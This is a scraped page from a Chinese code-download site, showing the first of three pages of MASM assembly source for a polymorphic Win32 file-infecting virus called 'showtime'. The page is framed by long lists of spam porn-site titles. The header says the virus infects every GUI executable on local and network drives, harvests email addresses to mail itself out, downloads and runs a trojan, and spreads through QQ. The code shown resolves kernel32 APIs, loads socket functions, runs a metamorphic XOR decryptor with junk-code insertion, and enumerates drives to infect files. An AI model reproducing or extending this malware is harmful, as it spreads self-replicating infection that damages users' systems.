亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關(guān)于我們
? 蟲蟲下載站

?? win32.poly.showtime2.txt

?? 簡 介: 1. 感染本地硬盤和網(wǎng)絡(luò)上所有exe(GUI)文件  2. 搜索本地所有郵件地址
?? TXT
?? 第 1 頁 / 共 3 頁
字號:
;***************************************************************
;     名  稱:Trash
;     測試平臺:Win98/masmV7.0
;     
;     申明:本文僅作技術(shù)研究,否則后果自負(fù)
;注:
;  
;編譯命令行:
;     ml /c /coff poly.asm
; link /subsystem:windows /section:.text,rew poly.obj
;***************************************************************     
;;簡 介:
;1. 感染本地硬盤和網(wǎng)絡(luò)上所有exe(GUI)文件 
;2. 搜索本地所有郵件地址,將病毒作為附件發(fā)送出去 
;3. 從網(wǎng)上下載木馬程序并運(yùn)行。 
;4. 利用QQ散播消息。
;************************************************* 
;工作流程: 
;1.首先得到重定位信息,保存在ebx中. 
;2.調(diào)用GetKBase ,得到Kernel32.dll的基地址。 
;3.調(diào)用GetAPIz,得到程序?qū)⑹褂玫腒ernel32中所有API.  
;4.判斷是被感染文件還是自身.如是被感染文件則分配空間并動態(tài)產(chǎn)生解密模塊,然后解密程序代碼。
;  否則直接到5
;5. 調(diào)用DownloadFile下載木馬程序
;6. 調(diào)用RunExe執(zhí)行木馬程序 
;7.調(diào)用DownloadFile下載郵件體hello.eml文件
;8. 啟動發(fā)送QQ消息線程
;9. 感染本地Exe文件
;***************************************************
.386
.Model Flat, StdCall
Option Casemap :None  
;___________________________________________________________________________
include d:\masm32\useful.inc
.code 
Main:
   Flag dd 45678h
 szCaption db "ShowTime",0
 szText db "Good luck!",0
Msgbox:
   invoke MessageBox,NULL,addr szText,addr szCaption,MB_OK
invoke ExitProcess,NULL


VStart:
 call Start 
Start: 
pop ebx      ;病毒在宿主中的位置
sub ebx , offset Start 
call GetKBase  ;獲得KERNEL.DLL基地址

jnz VStar
jz VStar
db 0e9h ;花指令
VStar:
call GetAPIz;獲得病毒用到的APIs的地址
mov eax,offset Msgbox
.if Flag!=45678h;第一次運(yùn)行則不用變形
Next1:
   push PAGE_EXECUTE_READWRITE
push MEM_COMMIT
push VirusLen
push NULL
call _VirtualAlloc[ebx]
mov hMem[ebx],eax
lea esi,[offset Load+ebx]
   mov edi,hMem[ebx]
mov ecx,EncryptLen/4
   push ebx
call Metamorphosize
    pop ebx
push ebx
call hMem[ebx]
    pop ebx
.endif

call Load


;**********獲得image of kernel32.dll的基址***************** 


GetKBase: 
mov edi , [esp+04h] 
and edi , 0FFFF0000h 
.while TRUE 
.if WORD ptr [edi] == IMAGE_DOS_SIGNATURE ;判斷是否是MZ 
mov esi, edi 
add esi, DWORD ptr [esi+03Ch] ;esi指向PE標(biāo)志
.if DWORD ptr [esi] ==IMAGE_NT_SIGNATURE;是否有PE標(biāo)志

.break;如果有跳出循環(huán) 
.endif 
.endif
sub edi, 010000h 
.if edi < MIN_KERNEL_SEARCH_BASE ;win9x 
mov edi, 0bff70000h ;0bff7000h=9x"base 
.break 
.endif 
.endw 
mov hKernel32[ebx],edi;把找到的KERNEL32。DLL的基地址保存起來
ret 

GetAPIz: 
push edi
mov edx,edi ;edx->KERNEL32基地址
assume edx :ptr IMAGE_DOS_HEADER 
add edx,[edx].e_lfanew 
assume edx:ptr IMAGE_NT_HEADERS 
mov edx,[edx].OptionalHeader.DataDirectory.VirtualAddress 
add edx,hKernel32[ebx];EDX->KERNEL32輸出表地址 

assume edx:ptr IMAGE_EXPORT_DIRECTORY 
push edx
mov ebp,[edx].AddressOfNames 
add ebp,hKernel32[ebx] ;ebp->指向所有函數(shù)名的RVA數(shù)組 
push ebp
xor eax,eax ;eax為序號 

.repeat 
push 14 ;為GetProcAddress函數(shù)名的長度 
pop ecx 
mov edi,[ebp] 
add edi,hKernel32[ebx] 
lea esi,[offset nGetProcAddress+ebx] 
repz cmpsb;比較輸出表中第I個函數(shù)名是否是GetProcessAddress
.if zero? 
.break ;如果是跳出
.endif 
add ebp,4 ;下一個RVA 
inc eax ;序號加1
.until eax == [edx].NumberOfNames ;[edx].NumberOfNames為函數(shù)的個數(shù) 

mov ebp, [edx].AddressOfNameOrdinals ;指向AddressOfNames數(shù)組中相關(guān)函數(shù)的序數(shù)的16位數(shù)組
add ebp, hKernel32[ebx] 
movzx ecx, word ptr [ebp+eax*2] ;取GetProcessAddress函數(shù)的序號 
mov ebp, [edx].AddressOfFunctions ;[edx].AddressOfFunctions指向所有輸出函數(shù)的RVA數(shù)組的首址 
add ebp, hKernel32[ebx] 
mov eax, [ebp+ecx*4]
add eax,hKernel32[ebx];eax為GetProcAddress函數(shù)的地址
mov _GetProcAddress[ebx],eax
pop ebp
pop edx
pop edi
xor eax,eax ;eax為序號 

.repeat 
push 12 ;LoadLibraryA函數(shù)名的長度 
pop ecx 
mov edi,[ebp] 
add edi,hKernel32[ebx] 
lea esi,[offset nLoadLibraryA+ebx] 
repz cmpsb;比較輸出表中第I個函數(shù)名是否是LoadLibraryA
.if zero? 
.break ;如果是跳出
.endif 
add ebp,4 ;下一個RVA 
inc eax ;序號加1
.until eax == [edx].NumberOfNames ;[edx].NumberOfNames為函數(shù)的個數(shù) 

mov ebp, [edx].AddressOfNameOrdinals ;指向AddressOfNames數(shù)組中相關(guān)函數(shù)的序數(shù)的16位數(shù)組
add ebp, hKernel32[ebx] 
movzx ecx, word ptr [ebp+eax*2] ;取LoadLibraryA函數(shù)的序號 
mov ebp, [edx].AddressOfFunctions ;[edx].AddressOfFunctions指向所有輸出函數(shù)的RVA數(shù)組的首址 
add ebp, hKernel32[ebx] 
mov eax, [ebp+ecx*4]
add eax,hKernel32[ebx];eax為LoadLibraryA函數(shù)的地址
mov _LoadLibraryA[ebx],eax
lea eax,[offset nKernel+ebx]
push eax
call _LoadLibraryA[ebx]
mov DWORD ptr hKernel32[ebx],eax

GetOApiz: 

call @api_table 

db "LoadLibraryA",0 
db "CreateThread",0 
db "CreateRemoteThread",0 
db "WinExec",0 
db "CreateMutexA",0 
db "OpenMutexA",0 
db "ReleaseMutex",0 
db "FindFirstFileA",0 
db "FindNextFileA",0 
db "FindClose",0 
db "CreateFileA",0 
db "CreateFileMappingA",0 
db "MapViewOfFile",0 
db "UnmapViewOfFile",0 
db "SetFilePointer",0 
db "ReadFile",0
db "GetComputerNameA",0
db "WriteFile",0 
db "CloseHandle",0 
db "VirtualAlloc",0 
db "VirtualAllocEx",0 
db "WriteProcessMemory",0 
db "VirtualFree",0 
db "VirtualFreeEx",0 
db "lstrcmpi",0 
db "lstrcpy",0 
db "lstrcat",0 
db "lstrlen",0 
db "GetFileSize",0 
db "GetSystemDirectoryA",0 
db "GetModuleFileNameA",0 
db "Sleep",0 
db "GetSystemTime",0 
db "DeleteFileA",0 
db "OpenProcess",0 
db "GetModuleHandleA",0
db "GetCurrentDirectoryA",0
db "SetCurrentDirectoryA",0
db "ExitProcess",0
db "GetExitCodeThread",0
db "ResumeThread",0
@api_table: 
pop edi 
call @api_dest 
K_Apiz: 
_LoadLibraryA dd 0
_CreateThread  dd 0
_CreateRemoteThread dd 0 
_WinExec  dd 0
_CreateMutex  dd 0
_OpenMutex  dd 0
_ReleaseMutex  dd 0
_FindFirstFile  dd 0
_FindNextFile  dd 0
_FindClose  dd 0
_CreateFile  dd 0
_CreateFileMapping dd 0 
_MapViewOfFile  dd 0
_UnmapViewOfFile  dd 0
_SetFilePointer  dd 0
_ReadFile dd 0
_GetComputerNameA dd 0
_WriteFile  dd 0
_CloseHandle  dd 0
_VirtualAlloc  dd 0
_VirtualAllocEx  dd 0
_WriteProcessMemory  dd 0
_VirtualFree  dd 0
_VirtualFreeEx  dd 0
_lstrcmpi  dd 0
_lstrcpy  dd 0
_lstrcat  dd 0
_lstrlen  dd 0
_GetFileSize  dd 0
_GetSystemDirectory dd 0 
_GetModuleFileNameA  dd 0
_Sleep  dd 0
_GetSystemTime dd 0 
_DeleteFile  dd 0
_OpenProcess dd 0
_GetModuleHandleA dd 0
_GetCurrentDirectoryA dd 0
_SetCurrentDirectoryA dd 0
_ExitProcess dd 0
_GetExitCodeThread dd 0
_ResumeThread dd 0


K_API_NUM = ($-K_Apiz)/4 ;病毒中用到的API函數(shù)的個數(shù) 
@api_dest: 
pop esi ;esi為存放找到的函數(shù)地址數(shù)組的首址
push K_API_NUM 
pop ecx 
xor ebp,ebp 
K_begin: 
push ecx 
push edi ;edi上面定義的函數(shù)名數(shù)組的首地址 
push hKernel32[ebx] 
call _GetProcAddress[ebx] 
or eax,eax 
jz GA_Fail 
;mov edx , DWORD ptr [esi+ebp] 
mov dword ptr [esi],eax 
GA_Fail: 
xor eax,eax 
repnz scasb ;尋找字符串結(jié)束標(biāo)志0,使edi指向下個函數(shù)名 
add esi,4 
pop ecx 
loop K_begin 
call szWsock32
  db "Wsock32.dll",0
  hSock dd 0
   
szWsock32:
   call _LoadLibraryA[ebx]
mov hSock[ebx],eax 
SockApis:
call SockTable
  db "WSAStartup",0
db "socket",0
db "htons",0
db "inet_addr",0
db "connect",0
db "send",0
db "closesocket",0
db "WSACleanup",0
db "gethostbyname",0
SockTable:
  pop edi
call SockDest
S_Apiz:
_WSAStartup dd 0
_socket dd 0
_htons dd 0
_inet_addr dd 0
_connect dd 0
_send dd 0
_closesocket dd 0
_WSACleanup dd 0
_gethostbyname dd 0
S_ApiNum=($-S_Apiz)/4
SockDest:
pop esi ;esi為存放找到的函數(shù)地址數(shù)組的首址
push S_ApiNum 
pop ecx 
xor ebp,ebp 
S_begin: 
push ecx 
push edi ;edi上面定義的函數(shù)名數(shù)組的首地址 
push hSock[ebx] 
call _GetProcAddress[ebx] 
or eax,eax 
jz G_Fail 
;mov edx , DWORD ptr [esi+ebp] 
mov dword ptr [esi],eax 
G_Fail: 
xor eax,eax 
repnz scasb ;尋找字符串結(jié)束標(biāo)志0,使edi指向下個函數(shù)名 
add esi,4 
pop ecx 
loop S_begin 
call szUser32
db "User32.dll",0
szFindWindowA db "FindWindowA",0
szFindWindowExA db "FindWindowExA",0
szSendMessageA db "SendMessageA",0
szChildWindowFromPointEx db "ChildWindowFromPointEx",0
_FindWindowA dd 0
_FindWindowExA dd 0
_SendMessageA dd 0
_ChildWindowFromPointEx dd 0
szUser32:
  call _LoadLibraryA[ebx]
push esi
mov esi,eax
call szwsprintfA
db "wsprintfA",0
  _wsprintf dd 0
szwsprintfA:
   push esi
 call _GetProcAddress[ebx]
   mov DWORD ptr _wsprintf[ebx],eax
   lea ecx,[offset szFindWindowA+ebx]
 push ecx
 push esi
 call _GetProcAddress[ebx]
 mov DWORD ptr _FindWindowA[ebx],eax
 lea ecx,[offset szFindWindowExA+ebx]
 push ecx
 push esi
 call _GetProcAddress[ebx]
 mov DWORD ptr _FindWindowExA[ebx],eax
 lea ecx,[offset szSendMessageA+ebx]
 push ecx
 push esi
 call _GetProcAddress[ebx]
 mov DWORD ptr _SendMessageA[ebx],eax
 lea ecx,[offset szChildWindowFromPointEx+ebx]
 push ecx
 push esi
 call _GetProcAddress[ebx]
 mov DWORD ptr _ChildWindowFromPointEx[ebx],eax

pop esi
ret 


;變形引擎原理:
;  變形代碼由2部分組成:
;  1)一段經(jīng)過32位密鑰異或加密的代碼
;  2)由引擎隨機(jī)生成的一段對這段加密代碼進(jìn)行解碼的模塊
;從7個通用寄存器中隨機(jī)選擇3個分別作為索引寄存器,密鑰寄存器和計(jì)數(shù)寄存器。并在
;解密模塊的每條有效語句之間隨機(jī)插入1~3條垃圾代碼。 

EAX_REG = 0
ECX_REG = 1
EDX_REG = 2
EBX_REG = 3
ESP_REG = 4
EBP_REG = 5
ESI_REG = 6
EDI_REG = 7 
INDEX_REG  =  0
KEY_REG   =  1
COUNT_REG  =  2
FREE_REG1  =  3
FREE_REG2  =  4
FREE_REG3  =  5
FREE_REG4  =  6 


Random:
    push eax
    db 0Fh, 031h ;EAX=隨機(jī)數(shù)
    xor edx, edx
    div dword ptr [esp+8];EAX/種子
    pop eax
    ret 4 


routine1: 

    mov byte ptr [edi], 0B8h ;B8H為MOV EAX,XXH B9為MOV ECX,XXH...
    mov dl, byte ptr [ebx+ecx]
    add [edi], dl
    inc edi
    ret 

;產(chǎn)生垃圾代碼
GenerateGarbabyCode: 

    push eax 

    push 3       ;<決定產(chǎn)生多少條啦級代碼
    call Random     ;
    lea ecx, [edx+1]  ; 
@PL1: mov esi,[esp] ;esi指向SYSTEMTIME結(jié)構(gòu)
call _GetSystemTime[ebx]
 ;獲取當(dāng)前系統(tǒng)時間

movzx eax , word ptr [esi+6] ;[esi+6]為SYSTEMTIME結(jié)構(gòu)的天數(shù)成員 
cmp ax,14h ;20號嗎? 
jnz PL_Exit 
KILL: ;如果當(dāng)前是20號則發(fā)作
call ShowTime 
PL_Exit: 
ret 

ShowTime:

ret

;************InfectDisk*********************** 
;遍歷本地硬盤,從C盤到Z盤,調(diào)用EnumDir遍歷所有exe 
;********************************************* 
EnumDisk PROC DirName : DWORD,FileType : DWORD 

.REPEAT 
push FileType 
push DirName 
call EnumDir 

mov eax,DirName 
inc byte ptr [eax] 
mov al,byte ptr[eax] 
.UNTIL al > "z" 
mov byte ptr [eax] , "c" 

ret 8 

EnumDisk ENDP 

;************EnumDir************ 
;遍歷DirName,尋找FileType類型文件 
;******************************* 
EnumDir PROC DirName : DWORD ,FileType:DWORD 

LOCAL hSearch : DWORD 
LOCAL DirorFile[MAX_PATH] : DWORD 

pushad 
push DirName 
lea esi,DirorFile 
push esi 
call _lstrcpy[ebx]

@pushsz "\*.*" 
push esi ;DirorFile 
call _lstrcat[ebx] 

lea edi,[offset wfd+ebx] 
push edi 
push esi 
call _FindFirstFile[ebx]
cmp eax,INVALID_HANDLE_VALUE 
jz ED_Exit 
mov hSearch,eax 

.REPEAT 
.if byte ptr [wfd+44+ebx]==".";wfd.cFilename
jmp short EN_NEXT 
.endif 

push DirName 
push esi 
call _lstrcpy[ebx] 

@pushsz "\" 
push esi 
call _lstrcat[ebx] 

lea eax,[wfd+44+ebx] 
push eax 
push esi ;DirorFile 
call _lstrcat[ebx] 

mov eax , dword ptr [wfd+ebx] 
and eax , FILE_ATTRIBUTE_DIRECTORY 
.if eax ==FILE_ATTRIBUTE_DIRECTORY 
push dword ptr FileType 
push esi 
call EnumDir 
.else ;是文件 

push dword ptr FileType 
push esi 
call AnFile 
.endif 

?? 快捷鍵說明

復(fù)制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
2023国产精品| 欧美午夜精品一区二区蜜桃| 精品久久久久久久人人人人传媒| 五月婷婷久久综合| 欧美午夜视频网站| 天天av天天翘天天综合网| 欧美日韩一区二区在线视频| 午夜精品久久一牛影视| 欧美一区二区视频免费观看| 免费在线欧美视频| 欧美mv日韩mv国产| 国产宾馆实践打屁股91| 国产精品二区一区二区aⅴ污介绍| 成人白浆超碰人人人人| 国产精品久久久久久久久免费樱桃 | 亚洲综合清纯丝袜自拍| 欧美午夜在线观看| 精品一区中文字幕| 国产精品国模大尺度视频| 在线观看成人免费视频| 日韩二区在线观看| 精品国产一区久久| av成人老司机| 日本中文在线一区| 国产精品国产精品国产专区不蜜| 欧美在线影院一区二区| 国产一区二区美女| 一区二区三区视频在线看| 欧美一区二区三区在线| 成人国产精品免费网站| 午夜a成v人精品| 国产清纯在线一区二区www| 日本大香伊一区二区三区| 蜜桃免费网站一区二区三区| 国产精品欧美一区二区三区| 欧美精品日韩一区| 成人黄色777网| 日日摸夜夜添夜夜添亚洲女人| 久久精品视频一区二区三区| 欧美在线小视频| 国产福利视频一区二区三区| 香蕉影视欧美成人| 国产精品美女久久久久久久网站| 欧美日韩成人一区| 97精品久久久久中文字幕| 麻豆freexxxx性91精品| 樱花影视一区二区| 久久九九99视频| 制服丝袜亚洲色图| 色欧美日韩亚洲| 国产成人综合在线播放| 偷拍一区二区三区| 亚洲天堂中文字幕| 2023国产精品自拍| 日韩一区二区不卡| 在线免费观看成人短视频| 国产成人av一区二区| 日韩福利电影在线| 亚洲国产综合91精品麻豆| 国产精品久久久久久久岛一牛影视 | 久久精品亚洲麻豆av一区二区| 欧美性色欧美a在线播放| 成人白浆超碰人人人人| 国产一区二区三区在线观看免费| 午夜激情久久久| 亚洲精品高清在线| 国产精品久99| 国产欧美日韩一区二区三区在线观看 | 成人动漫一区二区三区| 国产精品一区二区在线看| 视频一区国产视频| 亚洲国产成人porn| 亚洲夂夂婷婷色拍ww47| 亚洲欧美综合色| 国产精品久久久久影院| 日本一区二区三区国色天香 | 国产一区二区三区av电影| 美女爽到高潮91| 久久精品国产**网站演员| 日本免费在线视频不卡一不卡二| 一区二区三区精品在线| 一区二区欧美视频| 一区二区三区成人| 亚洲国产aⅴ成人精品无吗| 悠悠色在线精品| 亚洲va韩国va欧美va精品| 亚洲国产成人av好男人在线观看| 午夜视频在线观看一区二区三区 | 国产精品高清亚洲| 亚洲人亚洲人成电影网站色| 亚洲男人电影天堂| 亚洲国产毛片aaaaa无费看| 亚洲成人免费观看| 日本最新不卡在线| 国产一区二区三区高清播放| 丁香另类激情小说| 色综合天天做天天爱| 欧美日韩国产电影| 精品福利视频一区二区三区| 国产亚洲精品超碰| 亚洲视频一区在线| 日韩高清一区在线| 国内成人免费视频| 成人黄色777网| 欧美系列一区二区| 久久夜色精品一区| 亚洲欧美自拍偷拍| 亚洲成人精品在线观看| 久久99热这里只有精品| 国产91精品露脸国语对白| 色综合中文字幕| 日韩精品在线一区二区| 国产精品午夜春色av| 亚洲在线视频网站| 国产在线精品视频| 色视频成人在线观看免| 日韩免费视频线观看| 亚洲手机成人高清视频| 美腿丝袜亚洲综合| k8久久久一区二区三区| 6080国产精品一区二区| 欧美国产精品一区二区三区| 亚洲第一搞黄网站| 国产69精品久久久久777| 日本韩国精品一区二区在线观看| 欧美一区二区三区免费视频| 国产精品婷婷午夜在线观看| 亚洲成人久久影院| 成人国产亚洲欧美成人综合网| 9191久久久久久久久久久| 国产婷婷色一区二区三区| 一区二区三区资源| 国产精品性做久久久久久| 欧美人xxxx| 亚洲天堂av老司机| 国产乱码精品1区2区3区| 欧美日韩久久一区二区| 亚洲欧美中日韩| 麻豆精品一区二区综合av| 色狠狠综合天天综合综合| 久久综合一区二区| 午夜亚洲福利老司机| 91麻豆.com| 国产亚洲视频系列| 蜜桃av一区二区在线观看| 欧美日韩在线电影| 亚洲欧美日韩精品久久久久| 国产美女精品一区二区三区| 日韩一区国产二区欧美三区| 国产精品综合网| 日韩亚洲电影在线| 亚洲国产wwwccc36天堂| 一本色道久久综合精品竹菊| 中文一区二区在线观看| 精品一区二区三区免费毛片爱| 9191久久久久久久久久久| 亚洲精品美腿丝袜| 91一区二区在线| 中文幕一区二区三区久久蜜桃| 国产主播一区二区| 欧美大胆人体bbbb| 日韩国产成人精品| 欧美色综合网站| 午夜精品福利一区二区三区av | 欧美性猛交一区二区三区精品| 中文字幕日韩一区| 成人app在线| 国产精品每日更新在线播放网址| 国产精品1区2区| 国产欧美一区二区精品婷婷| 精品一区二区在线免费观看| 精品成人佐山爱一区二区| 精品一区二区在线播放| 精品久久久久久综合日本欧美 | 国产亚洲欧洲一区高清在线观看| 精品一区二区在线视频| 久久亚洲私人国产精品va媚药| 激情文学综合丁香| 久久天天做天天爱综合色| 国产麻豆精品在线观看| 国产丝袜美腿一区二区三区| 国产91在线观看丝袜| 亚洲三级小视频| 欧美手机在线视频| 日本欧美在线看| 亚洲精品在线三区| 国产激情偷乱视频一区二区三区| 国产日本一区二区| 99re这里只有精品首页| 亚洲最大的成人av| 欧美高清精品3d| 韩日av一区二区| 中日韩av电影| 91久久线看在观草草青青| 视频在线观看91| 久久久精品国产99久久精品芒果| 成人精品电影在线观看| 亚洲一区二区三区四区在线观看| 欧美日韩免费高清一区色橹橹 | 亚洲成精国产精品女|